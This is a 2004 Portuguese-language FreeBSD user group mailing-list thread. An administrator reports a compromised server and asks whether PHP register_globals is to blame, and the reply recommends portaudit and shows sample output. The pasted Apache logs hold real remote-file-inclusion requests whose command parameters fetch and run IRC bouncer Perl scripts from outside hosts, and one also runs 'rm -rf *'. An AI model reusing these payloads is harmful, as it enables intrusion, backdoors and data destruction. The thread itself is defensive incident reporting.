RES: [FUGSPBR] problema de seguranca!!
Marcello Silva Coutinho
Marcello.Coutinho em desenvolvimento.gov.br
Qua Jul 14 10:38:13 BRT 2004
voce tem instalado o portaudit? ele mostra os pacotes instalados que tem
falhas de segurança.
/usr/ports/security/portaudit
depois de instalado, um portaudit -F -a tira suas duvidas.
se tiver algum pacote furado, atualize o ports e use o portupgrade para
instalar a versão mais nova sem perder as configurações.
o portaudit mostara um resultado parecido com esse:
portaudit -F -a
>> Attempting to fetch from
ftp://ftp.dk.FreeBSD.org/pub/FreeBSD/ports/local-distfiles/eik/.
Receiving auditfile.tbz (7083 bytes): 100%
7083 bytes transferred in 0.3 seconds (25.70 kBps)
new database installed.
Affected package: apache-2.0.49_2
Type of problem: Apache input header folding DoS vulnerability.
Reference:
<http://people.freebsd.org/~eik/portaudit/81a8c9c2-c94f-11d8-8898-000d6111a6
84.html>
Affected package: png-1.2.5_4
Type of problem: libpng row buffer overflow.
Reference:
<http://people.freebsd.org/~eik/portaudit/1b78d43f-d32b-11d8-b479-02e0185c0b
53.html>
2 problem(s) in your installed packages found.
You are advised to update or deinstall the affected package(s) immediately.
att,
Marcello Coutinho
-----Mensagem original-----
De: Martin Augusto [mailto:martin em newsite.com.br]
Enviada em: terça-feira, 13 de julho de 2004 EST0209 16:24
Para: fugspbr em fugspbr.org
Assunto: [FUGSPBR] problema de seguranca!!
Olah pessoal,
Um do servidores aqui estah sendo acessado remotamente por um individuo que,
de alguma maneira que desconheco, vem executando comandos via http,
utilizando-se do usuario www. Recentemente ele baixou e rodou diversos
scripts em perl, como bncs por exemplo. Encontrei ainda outros arquivos,
como exploits para php, binario de linux no /tmp e em diretorios do website
hospedado.
Vejam o log do apache:
httpd-access.log:shasta069242.ig.com.br - - [02/Jul/2004:22:15:04 -0300]
"GET
/*protegido*/index.php?path=http://www.packetx.org/cmd.gif?&cmd=uname%20-a;c
d%20/tmp%20;%20fetch%20http://ircmortos.hpg.ig.com.br/psybnc.perl%20;%20perl
%20psybnc.perl%208888%20;%20rm%20-rf%20*
HTTP/1.1" 200 5000 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98;
DigExt)" httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br
- - [08/Jul/2004:22:08:03 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;w
get%20http://geocities.yahoo.com.br/malapunk/bnc.pl.txt
HTTP/1.1" 200 4269 "-" "iexplore.exe"
httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - -
[08/Jul/2004:22:08:04 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;w
get%20http://geocities.yahoo.com.br/malapunk/bnc.pl.txt
HTTP/1.1" 200 4269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
.NET CLR 1.1.4322)"
httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - -
[08/Jul/2004:22:08:12 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;f
tp%20http://geocities.yahoo.com.br/malapunk/bnc.pl.txt
HTTP/1.1" 200 4269 "-" "iexplore.exe"
httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - -
[08/Jul/2004:22:08:14 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;f
tp%20http://geocities.yahoo.com.br/malapunk/bnc.pl.txt
HTTP/1.1" 200 4269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
.NET CLR 1.1.4322)"
httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - -
[08/Jul/2004:22:08:35 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;p
erl%20bnc.pl.txt%2044444
HTTP/1.1" 200 4269 "-" "iexplore.exe"
httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - -
[08/Jul/2004:22:08:36 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;p
erl%20bnc.pl.txt%2044444
HTTP/1.1" 200 4360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
.NET CLR 1.1.4322)"
httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - -
[08/Jul/2004:22:09:22 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;p
erl%20bnc.pl.txt%202525
HTTP/1.1" 200 4269 "-" "iexplore.exe"
httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - -
[08/Jul/2004:22:09:23 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;p
erl%20bnc.pl.txt%202525
HTTP/1.1" 200 4359 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
.NET CLR 1.1.4322)" httpd-access.log:waverouter.censa.com.br - -
[09/Jul/2004:19:53:08 -0300] "GET
/*protegido*/index.php?path=http://www.packetx.org/cmd.gif?&cmd=cd%20/tmp;fe
tch%20http://farpador.com/bnc.pl
HTTP/1.0" 200 4496 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
httpd-access.log:waverouter.censa.com.br - - [09/Jul/2004:19:53:14 -0300]
"GET
/*protegido*/index.php?path=http://www.packetx.org/cmd.gif?&cmd=cd%20/tmp;pe
rl%20bnc.pl%208000
HTTP/1.0" 200 4427 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
httpd-access.log:waverouter.censa.com.br - - [09/Jul/2004:19:53:35 -0300]
"GET
/*protegido*/index.php?path=http://www.packetx.org/cmd.gif?&cmd=cd%20/tmp;pe
rl%20bnc.pl%208080
HTTP/1.0" 200 4504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
httpd-access.log:201009221110.user.veloxzone.com.br - -
[12/Jul/2004:16:55:31 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg?&cmd=cd%20/tmp;
perl%20bnc.pl%206666
HTTP/1.1" 200 4269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET
CLR 1.1.4322)" httpd-access.log:201009221110.user.veloxzone.com.br - -
[12/Jul/2004:16:56:21 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg?&cmd=cd%20/tmp;
perl%20bnc.pl%208080
HTTP/1.1" 200 4269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET
CLR 1.1.4322)" httpd-access.log:201009221110.user.veloxzone.com.br - -
[12/Jul/2004:16:59:42 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg?&cmd=perl%20/tm
p/bnc.pl%2080
HTTP/1.1" 200 4269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET
CLR 1.1.4322)" httpd-error.log:Não consegui escutar na porta 8888: Address
already in use at psybnc.perl line 128.
Verifiquei o arquivo /*protegido*/index.php e eh o php original do site
hospedado no servidor.
Alguem sabe o que pode estar possibilitando isso? Poderia ser por causa a
variavel register_globals do php, que deixei habilitada devido a problemas
com o Uebimiau e com o Squirrelmail?
Dados:
apache-1.3.31_2 The extremely popular Apache http server. Very fast,
very
mod_php4-4.3.4_2,1 PHP Apache Module
FreeBSD 5.2.1
Qualquer ajuda eh muito bem vinda,
Um abraco,
Martin Augusto
________________________________________________
Message sent using Mail
Newsite 2004
_______________________________________________________________
Para enviar um novo email para a lista: fugspbr em fugspbr.org Sair da Lista:
http://lists.fugspbr.org/listinfo.cgi
Historico: http://www4.fugspbr.org/lista/html/FUG-BR/
_______________________________________________________________
Para enviar um novo email para a lista: fugspbr em fugspbr.org
Sair da Lista: http://lists.fugspbr.org/listinfo.cgi
Historico: http://www4.fugspbr.org/lista/html/FUG-BR/
Mais detalhes sobre a lista de discussão freebsd